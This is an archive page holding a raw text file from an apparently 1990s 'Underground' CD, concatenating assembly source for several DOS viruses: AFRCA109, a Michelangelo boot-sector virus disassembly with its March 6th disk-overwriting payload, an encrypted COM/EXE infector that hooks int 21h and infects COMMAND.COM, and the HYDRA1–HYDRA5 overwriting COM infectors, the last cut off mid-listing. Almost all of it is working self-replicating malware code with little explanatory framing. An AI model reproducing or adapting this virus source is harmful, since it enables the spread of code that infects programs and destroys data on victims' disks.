Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / virgen / virusgen / V0001.DAT < prev next >

Wrap

Text File | 1996-05-27 | 128.0 KB | 5,167 lines

;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ AFRCA109 ██ ;██ ██ ;██ Created: 16-Sep-92 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ data_2e equ 4F43h data_3e equ 0FE00h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h afrca109 proc far start: mov si,100h push si mov ax,cs add ah,10h mov es,ax xor di,di ; Zero register mov cx,6Dh rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov dx,data_3e mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov dx,167h mov ah,4Eh ; 'N' jmp short loc_2 loc_1: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle mov ah,4Fh ; 'O' loc_2: push cs pop ds int 21h ; DOS Services ah=function 4Fh ; find next filename match mov cx,0FE1Eh jc loc_3 ; Jump if carry Set mov dx,cx mov ax,3D02h int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx xchg ax,bx push es pop ds mov dx,di mov ah,3Fh ; '?' int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,6Dh cmp byte ptr [di],0BEh je loc_1 ; Jump if equal push ax xor cx,cx ; Zero register mov ax,4200h cwd ; Word to double word int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset pop cx mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer jmp short loc_1 loc_3: push cs pop es mov bl,0FCh mov word ptr [bx],0AAACh mov word ptr [bx+2],0FCE2h pop di push bx retn sub ch,ds:data_2e dec bp add bl,al afrca109 endp seg_a ends end start done ; This is a disassembly of the much-hyped michelangelo virus. ; As you can see, it is a derivative of the Stoned virus. The ; junk bytes at the end of the file are probably throwbacks to ; the Stoned virus. In any case, it is yet another boot sector ; and partition table infector. michelangelo segment byte public assume cs:michelangelo, ds:michelangelo ; Disassembly by Dark Angel of PHALCON/SKISM org 0 jmp entervirus highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ; used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h int13h: push ds push ax or dl, dl ; default drive? jnz exitint13h ; exit if not xor ax, ax mov ds, ax test byte ptr ds:[43fh], 1 ; disk 0 on? jnz exitint13h ; if not spinning, exit pop ax pop ds pushf call dword ptr cs:[oldint13h]; first call old int 13h pushf call infectdisk ; then infect popf retf 2 exitint13h: pop ax pop ds jmp dword ptr cs:[oldint13h] infectdisk: push ax push bx push cx push dx push ds push es push si push di push cs pop ds push cs pop es mov si, 4 readbootblock: mov ax,201h ; Read boot block to mov bx,200h ; after virus mov cx,1 xor dx,dx pushf call oldint13h jnc checkinfect ; continue if no error xor ax,ax pushf call oldint13h ; Reset disk dec si ; loop back jnz readbootblock jmp short quitinfect ; exit if too many failures checkinfect: xor si,si cld lodsw cmp ax,[bx] ; check if already infected jne infectitnow lodsw cmp ax,[bx+2] ; check again je quitinfect infectitnow: mov ax,301h ; Write old boot block mov dh,1 ; to head 1 mov cl,3 ; sector 3 cmp byte ptr [bx+15h],0FDh ; 360k disk? je is360Kdisk mov cl,0Eh is360Kdisk: mov firstsector,cx pushf call oldint13h jc quitinfect ; exit on error mov si,200h+offset partitioninfo mov di,offset partitioninfo mov cx,21h ; Copy partition table cld rep movsw mov ax,301h ; Write virus to sector 1 xor bx,bx mov cx,1 xor dx,dx pushf call oldint13h quitinfect: pop di pop si pop es pop ds pop dx pop cx pop bx pop ax retn entervirus: xor ax,ax mov ds,ax cli mov ss,ax mov ax,7C00h ; Set stack to just below mov sp,ax ; virus load point sti push ds ; save 0:7C00h on stack for push ax ; later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ; memory size in K dec ax ; 1024 K dec ax mov ds:[413h],ax ; move new value in mov cl,6 shl ax,cl ; ax = paragraphs of memory mov es,ax ; next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax mov ax,offset int13h mov ds:[13h*4],ax mov ds:[13h*4+2],es mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ; copy to high memory ; and transfer control there jmp dword ptr cs:[7C00h+offset highmemjmp] ; destination of highmem jmp xor ax,ax mov es,ax int 13h ; reset disk push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ; hard disk infection? jne floppyboot ; if not, do floppies mov dx,80h ; Read old partition table of int 13h ; first hard disk to 0:7C00h jmp short exitvirus floppyboot: mov cx,firstsector ; read old boot block mov dx,100h ; to 0:7C00h int 13h jc exitvirus push cs pop es mov ax,201h ; read boot block mov bx,200h ; of first hard disk mov cx,1 mov dx,80h int 13h jc exitvirus xor si,si cld lodsw cmp ax,[bx] ; is it infected? jne infectharddisk ; if not, infect HD lodsw ; check infection cmp ax,[bx+2] jne infectharddisk exitvirus: xor cx,cx ; Real time clock get date mov ah,4 ; dx = mon/day int 1Ah cmp dx,306h ; March 6th je damagestuff retf ; return control to original ; boot block @ 0:7C00h damagestuff: xor dx,dx mov cx,1 smashanothersector: mov ax,309h mov si,firstsector cmp si,3 je smashit mov al,0Eh cmp si,0Eh je smashit mov dl,80h ; first hard disk mov maxhead,4 mov al,11h smashit: mov bx,5000h ; random memory area mov es,bx ; at 5000h:5000h int 13h ; Write al sectors to drive dl jnc skiponerror ; skip on error xor ah,ah ; Reset disk drive dl int 13h skiponerror: inc dh ; next head cmp dh,maxhead ; 2 if floppy, 4 if HD jb smashanothersector xor dh,dh ; go to next head/cylinder inc ch jmp short smashanothersector infectharddisk: mov cx,7 ; Write partition table to mov firstsector,cx ; sector 7 mov ax,301h mov dx,80h int 13h jc exitvirus mov si,200h+offset partitioninfo ; Copy partition mov di,offset partitioninfo ; table information mov cx,21h rep movsw mov ax,301h ; Write to sector 8 xor bx,bx ; Copy virus to sector 1 inc cl int 13h ;* jmp short 01E0h db 0EBh, 32h ; ?This should crash? ; The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end done LOC_21 EQU 21H*4 REAL_SIZE equ offset EOF CODE SEGMENT PARA PUBLIC 'CODE' ASSUME CS:CODE, DS:CODE ORG 0h VBUG PROC FAR nop call MASTER_UNCODE VB01: call VB00 VB00: pop bp sub BP, +7 mov ax, -1 int 21h or ah, ah je GO_PROG push ds xor ax, ax mov ds, ax ;BIOS data area sub word ptr ds:[0413H], 2 lds bx, ds:[LOC_21] mov word ptr cs:[BP]+offset OLD_21, bx mov word ptr cs:[BP]+offset OLD_21+2, ds ;Get interrupt 21h vector mov bx, es dec bx mov ds, bx sub word ptr ds:[0003H], 2048/16 ;Paragraph size mov ax, ds:[0012H] ;Get high memory segment sub ax, 2048/16 ;Make room for ourself mov ds:[0012H], ax ;Save it mov es, ax push cs pop ds mov si, bp ;Put 0000 into SI (if EXE..) xor di, di mov cx, REAL_SIZE+4 ;Plus OLD_21 information! cld rep movsb mov ds, cx ;Put zero into DS cli ;Disable maskable interrupts mov word ptr ds:LOC_21, offset NEW_21 mov word ptr ds:LOC_21+2, ax sti ;Enable interrupts mov ax, 4BFFH ;Infect COMMAND.COM file! int 21h pop ds push ds pop es GO_PROG: ;Check if EXE or COM program? or bp, bp ;Are we an EXE file? je RUN_EXE RUN_COM: ;Run this infected .COM file lea si, [BP]+offset RUN_PROG mov di, 100H push di cld movsw movsw DUMB_ROUTINE PROC NEAR ret ;Do a local return DUMB_ROUTINE ENDP RUN_EXE: mov ax, es ;Get PSP segment add cs:word ptr RUN_PROG+2, ax ;Reallocate entry segment db 0EAh ;JMP 0000:0000 RUN_PROG db 0B4H, 04CH db 0CDH, 021H NEW_21: cmp ax, -1 jne NW00 inc ax ;Overflow to 0000 iret NW00: cmp ah, 4Bh ;Infect program being executed jne RUN_OLD_21 cmp al, 03 je RUN_OLD_21 cmp al, -1 jne RO00 push cs pop ds mov dx, offset COMMAND_FILE call INFECT_PROGRAM IRET RO00: call INFECT_PROGRAM RUN_OLD_21: jmp dword ptr cs:OLD_21 ;Do original interrupt INFECT_PROGRAM PROC NEAR ; ;When entering a normal Int 21/AH=4BH ;DS:DX -> Ptr to filename ;ES:BX -> Ptr to Parm Block ;AL -> 0 - Load/Run, 3 - Overlay ; push es push ds push dx push cx push bx push ax ; push si ; push di mov ax, 4300H ;Get file attribute call DO_21 jb NO_CLOSE test cl, 00000001b je VB04 and cl, 11111110b ;Turn off bit 0 (so you can write) mov ax, 4301H ;Set file attribute call DO_21 jb NO_CLOSE VB04: mov ax, 3D02h ;Open file for reading & writing call DO_21 VB05: JNB VB06 NO_CLOSE: JMP END_21 VB06: mov bx, ax ;Put new handle into BX push cs pop ds mov ax, 5700H ;Get file date call DO_21 mov ds:FILE_TIME, cx mov ds:FILE_DATE, dx mov dx, offset TMP_HEADER ;Load in COM/EXE ? file header mov cx, 1BH ;Size of header (for EXE, it doesn't ;matter the extra bytes loaded for ;COM files. mov ah, 3Fh ;Read from file call DO_21 VB10: jb CLOSE_END cmp word ptr ds:SIGN, 'ZM' ;Is this an EXE file? (MZ) je INFECT_EXE INFECT_COM: mov al, byte ptr SIGN+1 cmp al, byte ptr SIGN+3 je CLOSE_END xor dx, dx xor cx, cx mov ax, 4202H ;Seek from EOF call DO_21 VB15: jb CLOSE_END ;Returns DX:AX number of bytes seeked (Size of file) cmp ax, 0E000H ;Check file size ja CLOSE_END push ax mov ax, ds:word ptr [SIGN+0] mov word ptr ds:RUN_PROG+0, ax mov ax, ds:word ptr [SIGN+2] mov word ptr ds:RUN_PROG+2, ax pop ax sub ax, 3 ;Calculate jmp to End of file mov byte ptr ds:SIGN+0, 0E9H ;JMP FAR mov word ptr ds:SIGN+1, ax mov byte ptr ds:SIGN+3, al ;Identification code jmp FINISH_INFECT ;From here in, both EXE & COM files are infected the same ;The virus is written, seek to start of file, and re-write the Header INFECT_EXE: cmp word ptr ds:START_IP, 1 jne VB19 VB18: CLOSE_END: jmp END_INFECT VB19: mov ax, ds:[FILE_SIZE] ;Get file size mov cx, 200H mul cx ;Convert to bytes offset ;If filesize, if bigger then 64K, the overflow is put into DX push ax push dx mov cl, 04h ror dx, cl shr ax, cl ;Convert to paragraphs add ax, dx sub ax, ds:SIZE_HEADER PUSH AX mov ax, ds:START_IP mov word ptr ds:RUN_PROG, ax mov ax, ds:START_CS add ax, 0010H mov word ptr ds:RUN_PROG+2, ax POP AX mov word ptr ds:START_CS, ax mov word ptr ds:START_IP, +1 inc word ptr ds:FILE_SIZE pop cx pop dx mov ax, 4200H ;Goto end of file call DO_21 VB20: jb VB25 FINISH_INFECT: xor ds:byte ptr [DC00]+1, 08h ;Toggle NEG/NOT xor ax, ax mov ds, ax mov AL, byte ptr ds:[46CH] ;Lowest byte of timer count push cs pop ds push cs pop es mov ds:[CODE_BYTE], AL ;Put high byte of file seek xor si, si mov di, offset REAL_EOF push di ;Push pointer mov cx, offset EOF cld rep movsb mov si, offset REAL_EOF+04H ;REAL_EOF+VB01 call DECODE pop dx ;Restore pointer mov cx, REAL_SIZE mov ah, 40h call DO_21 JB END_INFECT xor cx, cx xor dx, dx ;Distance to seek into file mov ax, 4200h ;Seek from start of file call DO_21 jb END_INFECT mov dx, offset TMP_HEADER ;Ptr to New modified header mov cx, 1BH ;Size of header mov ah, 40h ;Write to file call DO_21 VB25: END_INFECT: mov dx, ds:FILE_DATE mov cx, ds:FILE_TIME mov ax, 5701h ;Set file date/time call DO_21 CLOSE_FILE: mov ah, 3Eh ;Close the file call DO_21 END_21: ; pop di ; pop si pop ax pop bx pop cx pop dx pop ds pop es RET DO_21: pushf call dword ptr cs:OLD_21 ret COMMAND_FILE DB 'C:\COMMAND.COM',0 MASTER_DECODE: CODE_BYTE DB 80H MASTER_UNCODE: POP SI PUSH SI MOV AL, BYTE PTR CS:[SI+CODE_BYTE-OFFSET VB01] DECODE: MOV CX, OFFSET MASTER_DECODE-OFFSET VB01 DC00: NOT AL XOR CS:BYTE PTR [SI], AL INC SI LOOP DC00 RET INFECT_PROGRAM ENDP EOF: OLD_21 DD ? FILE_TIME DW ? FILE_DATE DW ? TMP_HEADER: SIGN DW ? LEN_IMAGE_MOD DW ? FILE_SIZE DW ? ;In 512-increments NUM_REAL DW ? SIZE_HEADER DW ? MIN_ABOVE DW ? MAX_ABOVE DW ? STACK_SS DW ? STACK_SP DW ? CHECKSUM DW ? START_IP DW ? START_CS DW ? DISPLAY_REAL DW ? OVERLAY_NUM DW ? REAL_EOF: VBUG ENDP CODE ENDS END VBUG done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA1 ██ ;██ ██ ;██ Created: 27-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_12e equ 100h data_13e equ 193h data_14e equ 196h data_15e equ 271h data_16e equ 293h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra1 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_3 db 'HyDra-1 Beta - Not For Release' db '. *.CO?' db 0 data_6 dw 0, 8B39h data_8 dw 0 data_9 db 0 db 29 dup (0) data_10 db 0 db 13 dup (0) data_11 db 'HYDRA$' copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. $' loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,193h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_3+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_10 mov al,2 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_13e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,193h mov cs:data_8,ax cmp word ptr ds:data_14e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_8 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_7 nop loc_6: push dx xor ax,ax ; Zero register mov ax,0F00h int 10h ; Video display ah=functn 0Fh ; get state, al=mode, bh=page ; ah=columns on screen mov ah,0 int 10h ; Video display ah=functn 00h ; set display mode in al mov ax,200h mov dh,6 mov dl,25h ; '%' int 10h ; Video display ah=functn 02h ; set cursor location in dx xor dx,dx ; Zero register mov dx,offset data_11 ; ('HYDRA') mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx mov ax,200h mov dh,17h mov dl,0 int 10h ; Video display ah=functn 02h ; set cursor location in dx mov dx,offset copyright ; ('Copyright (c)') mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx mov ax,200h mov dh,18h mov dl,0 int 10h ; Video display ah=functn 02h ; set cursor location in dx mov ax,3504h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov ax,es mov dx,bx mov ds,ax mov ax,2509h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx mov ax,0 int 21h ; DOS Services ah=function 00h ; terminate, cs=progm seg prefx loc_7: xor di,di ; Zero register mov si,data_15e mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_6,0 mov word ptr cs:data_6+2,es pop bx jmp dword ptr cs:data_6 push ds pop es mov cx,0FFFFh mov si,data_16e mov di,data_12e sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra1 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA2 ██ ;██ ██ ;██ Created: 27-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ data_1e equ 100h data_2e equ 235h data_3e equ 257h data_4e equ 522h psp_cmd_size equ 80h data_15e equ 157h data_16e equ 15Ah seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra2 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_7 db 'HyDra-2 Beta - Not For Release' db '. *.CO?' db 0 data_10 dw 0, 8B39h data_12 dw 0 data_13 db 0 db 29 dup (0) data_14 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,157h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_13 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_7+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_14 mov al,2 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_15e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,157h mov cs:data_12,ax cmp word ptr ds:data_16e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_12 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_7 nop loc_6: push dx xor ax,ax ; Zero register xor ax,ax ; Zero register mov ds,ax mov bx,data_4e mov ah,0FFh mov [bx],ah xor ax,ax ; Zero register int 13h ; Disk dl=drive 0 ah=func 00h ; reset disk, al=return status mov ax,0 int 21h ; DOS Services ah=function 00h ; terminate, cs=progm seg prefx loc_7: xor di,di ; Zero register mov si,data_2e mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_10,0 mov word ptr cs:data_10+2,es pop bx jmp dword ptr cs:data_10 push ds pop es mov cx,0FFFFh mov si,data_3e mov di,data_1e sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra2 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA3 ██ ;██ ██ ;██ Created: 27-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_11e equ 100h data_12e equ 156h data_13e equ 159h data_14e equ 234h data_15e equ 256h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra3 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_3 db 'HyDra-3 Beta - Not For Release' db '. *.CO?' db 0 data_6 dw 0, 8B39h data_8 dw 0 data_9 db 0 db 29 dup (0) data_10 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,156h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_3+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_10 mov al,2 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_12e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,156h mov cs:data_8,ax cmp word ptr ds:data_13e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_8 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_7 nop loc_6: push dx mov ax,3504h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov ax,es mov dx,bx mov ds,ax mov ax,2513h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx mov ax,0 int 21h ; DOS Services ah=function 00h ; terminate, cs=progm seg prefx loc_7: xor di,di ; Zero register mov si,data_14e mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_6,0 mov word ptr cs:data_6+2,es pop bx jmp dword ptr cs:data_6 push ds pop es mov cx,0FFFFh mov si,data_15e mov di,data_11e sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra3 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA4 ██ ;██ ██ ;██ Created: 28-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_11e equ 100h data_12e equ 154h data_13e equ 157h data_14e equ 232h data_15e equ 254h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra4 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_3 db 'HyDra-4 Beta - Not For Release' db '. *.CO?' db 0 data_6 dw 0, 8B39h data_8 dw 0 data_9 db 0 db 29 dup (0) data_10 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,154h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_3+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_10 mov al,2 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_12e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,154h mov cs:data_8,ax cmp word ptr ds:data_13e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_8 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_7 nop loc_6: push dx mov ax,3540h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov dx,bx push es pop ds mov ax,2513h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx mov ax,0 int 21h ; DOS Services ah=function 00h ; terminate, cs=progm seg prefx loc_7: xor di,di ; Zero register mov si,data_14e mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_6,0 mov word ptr cs:data_6+2,es pop bx jmp dword ptr cs:data_6 push ds pop es mov cx,0FFFFh mov si,data_15e mov di,data_11e sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra4 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA5 ██ ;██ ██ ;██ Created: 21-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ data_1e equ 23Eh psp_cmd_size equ 80h data_17e equ 187h data_18e equ 18Ah seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra5 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_4 db 'HyDra-5 Beta - Not For Release' db '. *.CO?' db 0 data_7 dw 0, 8B39h data_9 dw 0 data_10 db 0 db 29 dup (0) data_11 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,187h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_10 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_4+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_11 mov al,2 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_17e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,187h mov cs:data_9,ax cmp word ptr ds:data_18e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match ;* jc loc_6 ; Jump if carry Set db 72h, 54h jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_9 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_7 nop inc word ptr [bx+si] add [bx+si],al add [bx+si],al pop ds add [bx],bh aas ; Ascii adjust aas ; Ascii adjust aas ; Ascii adjust aas ; Ascii adjust aas ; Ascii adjust aas ; Ascii adjust aas ; Ascii adjust 